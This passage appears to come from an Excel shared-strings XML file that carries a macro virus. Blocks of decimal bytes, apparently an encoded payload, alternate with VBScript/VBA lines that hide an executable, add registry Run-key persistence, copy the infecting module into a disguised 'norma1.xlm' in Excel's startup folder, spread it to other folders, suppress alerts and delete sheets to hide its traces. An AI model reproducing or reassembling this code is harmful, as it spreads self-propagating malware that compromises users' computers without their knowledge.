37 218 240 156 99 187 173 222 106 35 61 59 119 205 94 71 52 141 103 64 84 236 63 246 137 202 141 222 172 137 46 155 218 1 207 231 218 209 254 237 197 250 16 38 247 218 236 152 169 61 162 207 108 </t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c attrib +s +h c:\sendto.exe", 0, True</t>
  </si>
  <si>
    <t xml:space="preserve">251 206 238 35 172 211 244 49 202 243 90 7 214 219 113 251 247 25 20 202 115 186 93 147 7 60 139 54 181 27 124 61 148 62 71 235 153 52 221 51 224 244 34 165 63 102 186 63 48 215 140 243 63 182 43 221 97 235 175 70 113 63 230 91 197 246 96 166 213 120 174 7 231 228 59 233 218 223 196 71 214 62 254 219 140 125 52 75 191 74 59 44 45 184 79 177 76 233 73 27 221 194 79 91 121 254 221 116 204 221 31 147 111 20 183 43 210 200 199 169 205 46 216 236 87 204 166 79 49 140 207 236 179 205 103 166 245 34 107 223 6 141 143 11 218 61 65 229 23 51 209 101 236 71 208 3 65 250 52 77 239 53 201 123 139 255 95 181 242 203 244 146 151 71 76 249 248 245 206 120 167 22 63 67 225 250 166 153 15 212 23 140 159 167 112 85 112 31 98 2 227 151 40 44 10 238 81 172 116 178 51 100 91 233 240 204 120 211 249 158 209 130 173 29 41 90 142 114 80 59 7 99 30 43 107 7 126 51 238 15 49 222 44 235 210 253 232 199 116 154 23 49 126 217 105 158 137 227 121 17 39 191 65 220 253 249 122 58 238 254 124 125 34 238 190 46 157 137 255 119 119 215 31 219 196 117 199 159 207 151 224 56 118 112 182 132 166 165 148 227 32 228 220 36 23 255 128 214 77 73 57 219 4 2 109 33 77 210 66 85 58 226 36 71 156 226 216 198 103 7 103 16 97 126 148 102 157 170 102 108 101 12 117 40 140 182 66 83 170 25 169 5 166 110 195 29 172 141 186 169 13 157 166 69 85 215 24 198 218 252 179 41 157 250 7 154 42 178 247 238 222 139 125 23 219 165 237 166 85 35 74 190 220 123 239 222 189 123 239 251 253 188 239 187 123 223 207 125 193 251 31 46 255 243 121 149 255 206 228 182 183 109 108 198 63 87 61 191 101 115 207 31 22 141 125 49 203 51 229 100 28 230 176 62 91 53 246 89 157 27 223 152 234 220 254 186 80 157 103 95 146 53 247 60 155 180 222 218 122 108 20 183 111 220 138 231 119 44 39 177 76 99 57 141 229 12 150 55 176 68 116 124 178 158 97 201 232 52 241 66 124 126 59 72 216 240 222 172 134 76 153 22 </t>
  </si>
  <si>
    <t>w.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Internet.exe","internet.exe"</t>
  </si>
  <si>
    <t xml:space="preserve">248 255 25 248 59 137 211 82 80 142 52 124 61 91 74 194 235 164 121 205 115 40 220 63 9 205 184 164 172 25 253 86 245 115 45 94 87 230 123 62 135 243 195 249 244 13 231 183 230 243 23 107 11 175 107 19 181 95 240 188 150 211 216 73 109 102 252 85 237 172 207 243 254 179 182 176 221 33 186 69 173 221 9 117 74 253 132 227 13 29 27 178 200 49 102 113 191 201 250 95 135 253 16 40 109 118 101 95 225 55 17 47 229 54 218 149 251 250 80 227 199 216 236 89 251 97 112 123 17 5 165 172 255 88 90 234 243 140 63 238 247 150 60 239 217 58 113 62 151 39 63 129 243 13 121 242 71 235 11 227 122 170 190 48 174 167 235 11 227 58 162 217 44 132 235 12 95 24 215 5 190 176 126 117 242 95 126 253 40 219 54 30 135 97 141 125 251 249 220 248 30 230 115 227 101 130 87 175 75 16 110 1 205 122 91 214 13 140 103 55 176 4 24 155 12 88 90 176 172 194 146 193 146 195 210 134 165 171 65 241 55 226 13 234 117 5 153 55 42 168 1 42 65 29 164 88 234 48 117 148 250 144 50 128 220 126 119 182 223 18 132 191 165 170 244 136 124 127 196 239 6 89 229 25 216 1 15 205 206 247 127 12 48 125 77 142 244 86 167 226 7 107 227 124 93 54 181 255 56 87 222 166 246 31 73 186 31 166 27 114 164 31 135 233 55 242 248 99 211 243 210 247 201 247 53 121 51 115 95 69 89 229 199 53 229 59 97 31 191 67 125 64 149 209 43 41 180 211 141 201 49 191 199 249 60 239 121 184 60 235 88 62 55 190 78 216 53 251 113 161 93 29 119 204 247 15 227 142 111 6 222 161 182 229 124 142 100 47 140 87 22 71 97 188 178 57 10 227 85 171 163 48 94 133 29 133 241 106 196 49 31 175 134 157 36 54 25 199 201 59 21 188 250 159 250 223 154 249 144 224 129 203 137 215 15 78 108 23 80 94 206 17 71 47 251 64 57 226 212 171 156 255 217 248 113 210 158 9 44 39 157 10 55 42 137 102 70 127 209 158 232 236 119 92 100 191 52 218 31 157 43 125 238 89 68 86 132 89 11 142 23 71 49 64 249 122 204 0 38 139 231 226 </t>
  </si>
  <si>
    <t>w.regdelete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Internat.exe"</t>
  </si>
  <si>
    <t xml:space="preserve">197 231 199 91 223 147 43 209 247 21 67 198 187 114 37 57 111 41 62 188 231 11 105 53 191 193 149 231 230 8 69 95 123 61 79 215 128 32 165 240 198 77 202 218 139 248 225 142 202 252 112 232 139 163 132 111 238 28 212 9 30 28 6 99 242 170 253 69 57 122 245 28 197 129 56 197 176 167 146 44 211 131 163 174 78 128 17 10 69 53 161 104 220 109 88 162 168 166 211 48 61 140 143 81 156 123 230 252 93 252 102 95 191 168 92 39 78 213 128 8 69 180 180 149 206 104 189 172 165 120 181 49 67 162 187 53 209 215 228 88 222 221 5 231 0 84 167 71 24 167 116 114 116 109 17 216 219 220 238 29 2 110 225 67 74 167 138 230 230 52 245 24 230 250 225 3 42 195 175 7 219 67 41 252 123 30 1 145 229 193 10 57 133 225 216 69 105 175 183 69 105 127 86 123 178 163 193 181 108 43 115 209 224 121 218 153 206 42 119 140 150 185 57 229 40 124 18 101 13 244 234 104 242 22 189 58 138 122 84 143 234 45 3 234 143 15 163 56 106 212 226 106 48 45 199 56 23 207 197 186 161 168 115 196 174 132 36 186 111 18 133 157 208 231 226 31 84 215 163 232 138 246 90 69 176 137 47 206 161 79 146 68 189 3 20 117 173 232 159 60 190 248 122 217 209 218 36 253 60 208 182 215 70 161 232 219 204 120 108 237 66 95 89 158 197 209 74 36 170 91 158 149 105 212 111 19 50 193 193 223 97 79 152 129 234 227 194 232 131 59 122 164 221 180 30 179 27 224 235 250 73 255 106 88 65 72 116 125 11 222 237 205 96 233 34 81 245 89 44 28 242 125 96 57 65 118 135 47 80 250 209 45 220 164 208 214 128 240 27 183 41 122 142 119 67 249 177 36 199 113 44 83 88 206 96 217 9 50 253 152 173 103 173 56 63 172 57 127 34 79 52 7 169 119 155 65 45 253 88 198 177 28 193 242 184 70 146 252 105 44 103 72 148 8 158 41 24 44 93 88 218 176 28 193 242 12 150 73 44 227 37 234 153 102 212 168 62 158 198 242 134 70 106 211 73 121 27 62 127 88 35 207 96 57 98 84 95 135 28 19 239 220 64 240 198 168 150 2 150 40 82 2 </t>
  </si>
  <si>
    <t xml:space="preserve">233 188 252 245 240 232 206 128 175 23 125 101 185 6 84 233 107 148 241 48 170 89 49 90 240 49 131 165 95 115 76 234 109 213 72 114 31 51 88 166 73 189 165 153 40 1 178 51 232 24 141 230 111 69 159 199 113 58 98 77 253 58 246 91 12 42 101 92 64 253 134 236 20 245 87 46 187 68 229 110 5 111 80 57 114 95 136 81 239 76 233 124 252 211 226 184 140 67 40 42 1 162 6 226 53 189 181 214 211 50 250 20 19 252 41 85 88 33 8 30 161 232 131 108 150 18 194 254 17 46 81 71 196 146 167 24 227 88 191 147 134 140 158 100 230 179 76 189 41 131 186 60 177 11 98 167 136 118 62 223 252 138 250 57 109 80 250 121 18 159 135 142 243 149 71 229 136 157 85 97 41 148 160 118 101 230 119 178 218 69 84 47 168 252 241 44 59 204 212 75 3 62 30 144 202 97 74 25 173 112 96 152 104 196 39 97 129 127 43 225 149 2 64 2 153 243 78 3 154 70 209 61 104 252 80 212 209 9 120 124 65 99 207 195 37 104 92 75 128 59 22 13 237 64 12 169 224 138 124 165 197 160 169 70 61 82 53 203 218 236 94 123 99 155 203 107 135 101 42 232 115 192 4 30 149 196 8 179 78 220 217 23 20 123 174 128 69 176 77 119 208 87 64 21 173 180 248 91 52 226 0 161 149 254 197 215 187 96 252 178 215 187 239 43 93 15 217 147 90 255 230 235 30 178 51 37 207 35 252 19 207 231 95 245 188 9 100 199 240 172 77 212 77 124 190 194 136 114 148 120 230 114 254 219 192 80 170 248 89 150 44 94 96 52 46 202 247 119 54 81 43 224 121 196 86 138 128 39 20 218 101 7 196 207 201 206 143 83 231 233 249 233 30 1 125 51 5 141 59 193 203 227 88 198 49 14 29 199 114 24 203 51 88 142 148 102 236 111 22 71 33 101 231 79 98 57 161 201 159 204 146 231 160 21 191 123 249 87 55 79 37 25 48 32 107 108 57 76 99 193 169 179 239 95 57 251 198 196 71 23 46 159 30 123 231 237 243 159 158 61 253 218 199 111 93 71 199 175 95 190 252 193 248 95 78 95 68 26 157 128 88 114 144 42 133 51 62 75 81 208 243 80 </t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>W</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>orkbooks.Open Application.StartupPath &amp; "\norma1.xlm"</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">158 44 24 76 153 246 143 1 42 231 104 144 145 170 6 117 208 14 242 149 170 80 149 82 70 14 102 176 86 94 158 175 77 255 141 250 51 120 51 131 251 41 142 239 39 77 112 205 132 252 158 164 236 225 200 243 187 25 227 132 57 195 70 192 192 217 234 156 172 83 229 240 234 44 236 161 99 122 244 9 122 69 235 23 233 213 169 99 24 241 104 189 71 168 208 147 183 227 227 38 5 87 80 148 69 198 47 19 163 18 199 22 188 103 45 75 141 96 2 183 136 235 99 160 30 254 234 53 165 171 193 221 122 10 158 99 211 175 0 126 216 79 43 64 128 214 201 136 176 39 20 233 225 119 199 250 162 80 139 208 156 96 151 199 191 21 247 3 218 133 157 193 65 204 5 20 64 4 48 196 10 116 248 190 60 248 136 146 113 218 128 215 7 115 235 22 51 154 23 21 118 159 73 124 103 132 237 103 50 107 126 184 96 158 99 227 233 123 61 31 27 79 42 109 31 70 28 60 19 30 159 68 249 129 109 239 122 239 122 143 115 29 112 184 235 221 182 245 238 122 96 183 221 227 170 119 223 235 4 174 122 155 203 102 115 120 18 78 231 189 118 207 234 33 243 62 1 19 242 252 166 221 64 8 121 36 74 52 141 203 132 60 62 154 16 242 136 227 132 144 231 76 185 87 64 108 60 146 88 185 164 3 32 54 30 68 198 99 65 108 60 139 170 189 49 137 65 100 60 223 45 109 110 141 129 174 64 95 55 179 21 246 164 191 121 64 12 70 37 166 211 29 14 51 110 74 15 76 190 36 226 215 41 241 39 202 120 240 115 240 152 47 210 34 6 194 27 169 117 96 91 189 221 108 52 27 143 180 38 154 18 110 196 217 163 91 6 118 108 22 247 32 178 33 208 5 113 136 243 12 62 54 226 11 48 91 129 73 98 138 140 163 86 179 113 227 206 68 9 127 248 61 91 135 191 79 122 218 124 168 100 75 68 167 91 216 142 92 127 137 163 237 214 162 10 22 41 133 5 105 133 142 130 166 102 97 58 252 34 120 164 57 222 71 69 117 15 32 114 156 30 38 140 200 113 54 85 28 46 55 47 180 50 188 55 20 30 124 231 118 179 209 0 87 12 27 150 32 94 159 165 198 </t>
  </si>
  <si>
    <t>thisworkbook.Sheets("(m1)_(m2)_(m3)").Columns(2).Copy workbooks("norma1.xlm").sheets("(m1)_(m2)_(m3)").Columns(2)</t>
  </si>
  <si>
    <t xml:space="preserve">208 166 5 116 195 115 149 53 75 3 177 254 153 160 196 57 222 93 86 126 247 239 140 30 238 128 251 46 9 177 236 192 59 3 141 77 172 60 165 200 44 223 108 29 211 6 196 157 98 68 234 8 181 181 192 89 36 81 220 84 243 251 135 106 60 203 168 98 121 62 41 245 46 75 244 247 134 34 131 192 248 168 4 200 156 66 139 61 66 241 195 190 238 72 8 116 12 134 197 198 166 120 32 225 13 245 247 251 130 61 135 54 92 243 93 250 73 71 36 150 120 67 183 61 49 164 127 228 64 115 212 35 238 12 69 68 147 55 32 156 109 59 84 199 120 125 150 96 183 24 112 159 132 160 109 9 136 190 32 24 222 18 100 20 166 163 148 83 138 93 21 62 221 44 198 163 39 159 123 225 16 109 58 220 196 208 1 191 79 146 46 87 173 117 55 186 117 93 165 211 20 91 116 253 193 110 191 78 120 242 97 169 215 19 138 115 128 85 192 148 77 49 43 25 119 119 180 51 88 186 21 172 132 75 122 4 167 128 224 41 32 128 74 93 191 170 83 240 148 62 125 49 85 59 208 245 184 40 209 155 67 244 183 107 153 129 174 230 198 56 56 208 127 48 248 215 238 159 149 13 116 125 178 142 246 46 62 172 107 98 94 106 40 219 145 126 234 246 235 197 155 67 47 221 38 80 27 131 237 85 209 8 39 44 185 218 92 199 176 128 103 173 136 213 200 182 116 5 45 50 163 119 254 195 120 240 68 59 156 176 123 30 20 7 37 134 221 91 5 93 193 3 167 132 98 175 223 7 130 189 50 139 185 27 116 119 139 146 196 196 3 160 77 244 245 108 9 6 6 129 217 184 33 212 17 98 118 127 30 235 235 188 71 140 252 13 108 168 16 152 253 21 246 26 216 184 232 155 223 111 254 33 191 14 244 249 2 161 94 137 139 63 27 88 174 107 79 187 220 146 21 196 77 161 61 79 47 73 173 98 161 141 127 36 129 187 154 56 118 201 181 69 190 209 19 175 46 210 245 172 48 27 125 246 70 179 113 118 41 107 102 63 46 249 173 105 191 35 116 98 127 89 172 108 234 170 45 177 40 81 246 241 134 75 79 184 83 47 235 22 235 103 199 174 141 41 142 255 191 122 133 87 </t>
  </si>
  <si>
    <t>workbooks("norma1.xlm").save</t>
  </si>
  <si>
    <t xml:space="preserve">204 43 95 189 206 94 253 99 247 6 175 126 225 190 131 190 23 118 92 74 63 194 66 40 153 134 88 34 184 250 95 254 53 83 118 240 123 107 129 249 202 14 93 201 172 105 95 247 129 133 109 29 157 145 190 126 238 161 54 176 73 239 5 112 69 42 113 171 86 215 89 24 167 149 159 216 21 19 173 186 180 227 1 134 69 216 245 29 254 205 138 151 13 150 221 147 156 52 18 31 12 187 3 98 100 36 250 202 250 31 23 177 186 63 236 178 242 50 165 212 123 66 135 157 74 214 38 7 194 225 89 250 51 122 246 71 247 89 22 235 130 201 59 91 245 87 215 184 239 159 149 118 204 74 246 225 122 195 107 171 47 174 92 159 216 218 247 248 72 145 157 233 92 83 185 89 2 82 236 173 96 199 182 207 134 36 174 239 207 131 19 79 124 190 203 254 122 121 185 113 35 117 229 190 71 217 232 130 217 35 69 110 122 213 146 133 174 138 133 250 206 247 239 157 26 250 92 226 166 42 167 134 208 207 210 103 238 120 230 147 169 161 242 103 223 91 224 13 85 238 125 242 200 69 106 255 121 106 106 40 189 7 229 86 254 224 79 67 174 41 165 100 234 249 8 103 190 214 228 88 179 244 151 63 253 108 237 243 247 39 78 218 118 181 139 81 19 179 71 88 222 246 11 113 75 215 83 64 236 142 114 44 92 161 39 240 18 189 115 181 131 237 164 196 184 112 132 61 203 118 175 106 220 190 170 136 111 213 217 206 237 225 147 109 177 32 83 73 165 162 204 129 129 132 215 31 225 156 171 172 201 237 187 109 13 235 99 129 200 249 9 16 213 213 185 24 91 29 189 187 218 48 218 229 239 163 131 189 113 211 173 211 99 253 223 255 251 55 79 8 103 195 248 54 0 128 67 75 220 61 11 120 20 229 181 255 206 78 146 77 8 16 32 96 128 16 192 152 38 34 224 238 38 196 4 40 154 39 65 67 2 73 128 180 6 179 175 217 236 146 217 157 237 236 108 30 202 133 160 160 84 107 109 109 125 92 172 138 104 125 85 124 163 96 171 60 228 90 172 124 92 236 245 83 110 189 126 133 214 235 5 175 90 169 168 81 146 157 123 206 63 255 236 108 50 81 1 191 222 246 222 205 </t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">fso.copyfile </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>Application.StartupPath &amp; "\norma1.xlm",myfolder,true</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">55 249 223 231 63 231 252 231 127 157 255 159 57 201 246 15 75 207 209 254 225 217 218 31 68 67 28 139 70 155 237 47 94 114 142 245 219 152 237 194 51 173 31 117 137 151 91 244 250 87 146 74 82 1 238 50 192 162 145 92 78 106 72 21 181 228 119 198 246 47 207 218 254 36 218 0 92 48 93 243 251 72 144 200 223 66 200 108 64 127 26 179 203 120 166 245 227 247 65 255 43 241 201 82 203 106 205 189 144 185 143 176 67 130 32 179 208 185 36 155 217 17 155 202 236 152 177 251 155 175 50 247 41 221 46 96 62 179 63 198 194 75 24 60 55 115 211 235 146 237 255 113 100 23 179 87 246 122 234 80 251 101 72 197 134 84 189 165 56 106 213 113 102 26 251 24 42 131 176 36 205 252 157 90 253 135 182 121 208 18 85 58 251 112 246 125 172 140 195 102 46 99 37 211 82 181 183 121 206 79 213 190 62 54 61 85 251 234 214 94 139 102 213 208 194 105 110 5 115 255 55 78 144 50 65 170 145 192 113 12 135 26 230 246 50 247 95 153 59 150 225 212 200 220 91 152 43 130 155 141 254 116 49 147 12 244 247 168 36 202 43 42 154 7 68 45 150 168 168 124 68 77 129 37 49 71 180 136 136 122 218 62 216 159 163 242 173 106 81 155 10 107 103 94 164 185 81 7 98 19 213 209 62 252 14 108 171 186 170 76 229 201 252 58 53 133 172 62 125 113 145 122 122 186 77 85 167 58 121 162 168 17 245 66 158 136 106 171 90 202 147 50 53 71 205 93 15 44 157 0 124 252 254 215 129 92 222 170 14 74 101 106 1 108 164 41 212 2 158 215 209 162 217 120 86 51 81 227 119 66 67 144 11 129 50 149 87 137 58 175 76 37 142 1 127 29 20 253 122 140 227 119 165 17 134 25 113 178 58 190 169 4 159 40 113 117 81 157 202 209 18 243 219 104 209 145 75 108 41 83 231 2 118 5 69 71 227 152 27 136 249 56 254 181 196 108 177 209 2 131 247 50 178 108 180 58 36 140 178 207 166 146 58 168 208 70 10 230 231 168 163 224 255 209 120 6 41 136 239 221 19 199 38 213 177 200 212 176 136 63 58 137 236 96 195 159 102 194 48 133 189 186 </t>
  </si>
  <si>
    <t>a1:</t>
  </si>
  <si>
    <t xml:space="preserve">48 69 84 201 184 83 154 173 72 44 240 48 21 154 9 218 152 113 16 228 163 104 136 61 200 172 196 153 159 102 3 210 158 100 19 81 1 126 69 224 17 33 190 21 30 94 69 165 184 21 112 229 72 17 60 54 120 246 88 217 247 135 19 50 71 77 95 206 249 70 193 99 2 148 187 136 137 76 218 41 178 17 191 24 194 135 13 220 209 202 77 103 88 29 236 175 87 7 62 107 83 201 88 190 77 29 240 215 171 171 79 23 231 94 207 145 54 168 132 47 83 83 50 201 5 163 201 232 58 52 185 94 166 85 89 120 60 94 104 83 11 139 212 79 209 62 236 212 243 17 135 89 249 17 117 234 28 50 171 118 161 122 213 4 146 77 6 131 7 226 3 159 29 137 51 68 166 148 169 165 54 178 80 45 130 134 56 30 39 19 248 35 241 248 222 122 21 121 143 213 125 64 0 67 21 49 164 216 234 201 105 44 185 199 66 46 162 246 58 135 210 61 53 155 124 74 191 245 60 72 157 55 47 86 212 220 42 139 185 125 172 19 242 186 112 71 153 85 184 80 157 58 145 100 76 130 54 154 183 80 37 185 154 201 207 28 181 160 176 94 45 248 20 249 140 101 232 59 136 41 121 239 113 212 80 150 142 75 42 195 101 3 119 198 184 84 115 164 107 88 174 243 128 67 69 106 1 2 76 161 114 183 63 110 240 56 151 241 248 136 37 135 216 246 199 227 219 22 170 154 248 12 126 50 153 76 222 19 183 237 129 56 27 61 164 179 144 129 149 47 67 29 208 123 203 212 253 241 61 241 210 84 198 221 220 5 156 193 203 188 74 36 33 37 111 133 70 203 216 4 95 238 180 208 47 81 158 57 63 184 188 119 17 194 153 146 254 28 167 181 228 89 85 65 150 175 207 34 167 200 43 131 253 253 113 96 76 81 61 29 81 202 140 241 161 140 117 247 253 241 85 11 113 212 204 73 140 154 133 56 106 94 200 83 102 64 127 95 168 246 199 115 235 172 100 156 216 163 14 254 162 76 205 42 129 37 5 200 32 212 49 66 239 229 217 155 19 191 129 190 102 31 210 127 115 136 254 209 111 173 255 30 129 209 162 13 164 118 164 126 92 6 233 251 227 86 178 7 158 133 73 125 </t>
  </si>
  <si>
    <t>fso.deletefile "c:\excel.txt"</t>
  </si>
  <si>
    <t xml:space="preserve">248 56 148 89 107 213 172 78 252 253 231 142 226 162 28 128 199 3 131 79 197 1 40 147 188 195 40 121 34 218 198 157 74 196 83 241 193 96 157 10 35 93 60 240 70 124 147 133 92 138 3 65 171 58 240 97 255 8 37 170 161 4 96 146 144 133 92 114 218 142 114 169 213 142 61 247 82 254 247 113 202 241 111 132 65 7 164 223 199 79 169 175 232 197 161 219 94 106 72 12 76 77 133 109 116 122 250 122 56 104 236 76 159 110 82 242 54 89 168 236 143 2 154 227 235 222 136 63 75 206 112 254 60 16 103 115 219 193 120 242 148 115 48 174 113 255 64 60 105 254 60 24 63 16 255 7 157 63 31 166 243 39 16 179 51 254 181 196 140 60 127 34 97 230 249 51 29 254 63 172 205 159 155 207 126 254 28 54 10 145 9 14 182 230 230 45 57 214 146 33 253 47 151 217 22 198 223 187 80 211 27 240 244 195 243 77 115 233 65 232 131 7 226 67 231 82 59 179 207 60 240 138 182 98 61 156 174 175 245 181 248 100 139 48 201 118 156 39 193 178 175 12 118 2 22 102 189 121 33 117 45 204 229 152 107 213 172 170 175 215 202 124 147 253 230 212 33 247 124 234 40 141 179 201 46 182 2 197 149 51 79 138 200 80 251 205 227 44 198 90 34 111 218 73 182 178 40 33 95 232 107 106 40 101 3 40 51 70 44 53 115 196 210 249 179 73 57 91 222 114 180 82 59 185 224 12 42 157 77 122 89 41 43 45 85 66 134 110 213 70 46 133 42 222 189 204 111 228 182 94 198 1 161 211 94 103 9 101 195 12 84 159 219 207 242 231 167 250 44 236 214 149 125 22 199 253 36 157 68 178 83 97 66 184 150 35 190 135 173 60 201 128 58 87 86 86 44 147 165 53 194 102 175 146 130 251 161 203 184 236 53 169 92 198 119 185 140 52 78 182 100 219 82 82 199 167 115 227 233 245 169 159 147 76 238 242 133 28 76 99 22 185 47 170 248 36 81 88 196 77 38 81 162 192 86 83 34 125 34 17 64 66 252 164 128 107 35 214 89 109 139 43 34 145 118 246 157 247 78 77 209 72 77 37 46 110 119 145 233 124 133 246 169 116 212 228 142 148 105 254 29 46 </t>
  </si>
  <si>
    <t>Application.DisplayAlerts = False</t>
  </si>
  <si>
    <t xml:space="preserve">98 197 76 187 21 23 172 201 16 20 83 228 98 198 43 242 92 132 227 87 121 54 1 168 81 125 184 96 180 144 164 228 159 78 115 145 9 44 122 4 216 179 22 184 72 22 159 140 29 42 92 159 73 113 145 204 97 133 48 254 216 159 0 147 204 61 71 29 49 217 69 82 248 42 209 29 141 78 249 181 139 88 248 30 41 203 69 50 104 17 85 109 175 108 239 114 203 237 205 130 178 254 39 0 158 1 170 10 184 117 181 34 213 42 182 62 163 151 176 144 30 81 215 47 78 126 207 32 67 139 165 54 21 211 67 46 16 174 38 65 148 220 190 194 19 64 49 233 14 255 20 40 78 31 90 101 119 184 252 148 139 140 97 229 87 68 124 110 69 168 149 165 16 214 122 223 36 83 246 198 112 233 39 46 50 154 101 175 14 70 35 162 187 23 53 125 74 244 212 103 64 33 161 90 87 247 165 46 24 11 154 133 48 213 148 54 228 25 36 53 9 107 4 175 82 33 138 26 109 209 213 191 195 156 126 168 76 2 110 205 56 2 205 53 180 66 61 169 104 43 146 19 237 141 42 66 200 125 159 142 66 34 155 150 240 218 84 200 196 106 210 180 240 25 16 99 37 21 62 223 231 50 178 160 194 183 174 13 176 76 206 114 229 155 122 203 25 205 128 241 117 91 92 132 215 27 66 138 244 190 178 27 33 129 175 126 61 98 130 81 171 60 119 110 64 65 19 122 132 203 110 50 53 38 196 46 175 211 155 38 17 235 233 85 132 191 0 132 52 158 221 198 72 45 69 184 254 168 244 254 45 128 8 161 167 31 168 105 4 54 245 223 8 130 66 186 67 89 200 163 80 175 95 18 125 130 188 161 5 154 139 52 71 4 111 208 45 214 210 168 168 109 3 22 213 210 133 158 96 84 137 62 152 129 49 94 10 76 139 255 96 187 9 67 168 244 116 61 196 82 254 107 229 30 195 186 134 73 200 164 109 128 161 222 126 177 112 251 97 61 139 133 212 198 68 17 47 200 29 190 7 40 34 64 49 66 202 123 71 23 168 100 94 96 202 182 163 136 21 246 139 22 161 71 65 17 123 232 5 172 191 86 146 81 102 131 32 17 229 192 117 138 79 193 199 38 222 97 116 211 10 19 </t>
  </si>
  <si>
    <t>for i=1 to thisworkbook.sheets.count</t>
  </si>
  <si>
    <t xml:space="preserve">130 254 212 109 216 182 66 207 119 86 155 228 85 232 57 116 210 104 240 42 84 95 79 185 25 185 186 198 109 166 116 77 198 54 35 239 74 183 24 19 222 189 194 36 144 122 59 100 204 70 146 169 184 55 72 211 238 6 96 188 110 95 245 203 191 0 81 188 24 65 63 114 231 159 157 64 54 132 155 4 204 81 25 243 251 15 191 79 243 215 54 183 52 173 168 106 9 1 247 82 249 238 102 165 87 20 182 220 140 41 157 130 28 22 196 98 103 251 47 129 34 62 97 35 245 196 119 112 16 9 160 55 63 23 243 137 17 132 38 200 139 110 119 145 137 124 184 33 22 242 8 114 163 191 18 132 44 218 34 209 114 143 129 124 79 130 140 67 210 48 69 17 194 173 229 26 98 141 93 130 44 186 35 17 193 23 202 67 212 27 87 214 52 213 87 44 91 86 83 189 35 27 90 129 79 50 82 251 189 1 148 221 128 38 160 183 143 55 245 29 138 92 227 81 163 239 52 7 175 22 62 58 141 173 28 237 70 124 176 17 15 29 50 181 45 102 155 234 70 242 68 244 110 147 32 7 241 98 189 48 80 248 4 113 53 128 24 63 180 72 82 234 162 119 112 236 193 190 21 125 124 189 169 201 116 46 253 54 100 66 151 86 118 75 49 242 223 75 57 179 254 67 100 128 191 54 216 35 248 96 120 235 108 253 5 242 57 92 35 203 85 146 79 40 232 130 246 216 104 3 8 86 24 202 162 130 220 37 248 28 95 92 99 142 116 126 121 13 194 137 94 189 204 173 4 80 6 226 99 1 45 2 45 222 190 180 162 117 89 69 75 93 67 197 210 154 102 1 169 196 163 182 101 114 176 11 186 234 107 128 9 207 71 21 57 182 102 30 52 219 176 177 119 104 225 247 26 76 76 196 130 111 110 193 217 77 20 167 93 133 136 47 9 43 32 74 110 241 131 1 108 105 61 84 23 236 8 60 159 14 68 83 172 45 68 242 251 97 52 58 254 40 109 123 234 199 28 23 172 70 182 104 39 168 157 55 33 98 18 200 201 134 66 28 127 180 145 69 129 94 140 237 121 253 139 192 1 218 107 105 155 236 108 215 7 252 33 93 151 166 13 6 176 175 122 122 159 109 51 229 129 81 </t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>if left(thisworkbook.sheets(i).name,3)="</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>模块表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>" then</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">90 134 89 174 209 127 199 127 211 161 54 32 95 177 14 229 134 37 67 184 109 1 246 185 38 1 38 29 175 224 31 131 129 80 180 195 35 245 116 231 254 208 52 230 176 148 173 63 66 220 162 1 73 86 194 208 14 185 178 169 222 68 218 209 78 148 34 26 236 30 109 18 21 26 127 255 235 88 105 135 64 201 182 205 71 208 24 160 35 66 248 61 125 248 49 214 0 209 202 15 96 174 226 53 118 121 221 30 44 118 195 111 17 6 11 244 110 199 58 155 97 57 163 220 124 33 142 125 48 163 6 115 167 155 155 22 162 55 111 196 217 198 45 203 163 98 166 177 28 98 115 157 200 54 111 192 49 107 157 230 113 94 196 60 197 179 153 167 100 14 243 204 155 203 60 165 23 51 207 37 118 230 41 115 48 79 185 115 29 34 4 0 237 207 223 198 124 142 157 186 207 185 235 54 211 44 188 162 82 138 133 125 111 251 76 109 193 136 93 123 31 182 167 15 15 2 233 56 208 120 55 2 195 179 195 29 157 56 199 121 97 82 197 248 129 7 113 136 246 126 63 11 103 90 237 162 195 31 143 152 106 211 18 150 52 35 182 62 73 121 100 163 137 105 8 121 230 235 198 242 168 89 113 203 74 44 130 125 50 120 74 103 33 151 184 220 32 68 173 184 22 34 13 20 112 11 187 97 240 131 199 140 193 12 75 58 215 163 4 71 165 124 243 98 42 42 189 6 171 163 44 20 137 168 54 65 107 146 177 188 13 7 205 253 247 239 62 241 212 135 142 103 61 70 192 185 35 41 80 252 92 82 160 228 249 164 192 188 157 73 129 210 93 73 129 75 94 240 96 119 119 59 58 177 10 29 75 89 2 97 83 222 242 39 173 134 220 93 66 69 212 191 128 10 27 250 221 175 26 249 171 181 211 231 27 127 103 44 4 123 68 45 82 43 119 250 157 164 241 60 32 117 143 253 212 152 39 113 112 139 30 218 109 44 127 155 244 123 7 142 42 199 14 175 177 86 168 2 94 226 141 3 236 249 122 55 161 119 13 112 252 235 186 222 136 236 17 241 206 193 65 119 136 238 114 120 216 84 226 102 247 97 171 37 201 48 51 26 255 250 146 190 55 176 120 136 53 221 18 82 67 106 </t>
  </si>
  <si>
    <t>ThisWorkbook.Sheets(i).Delete</t>
  </si>
  <si>
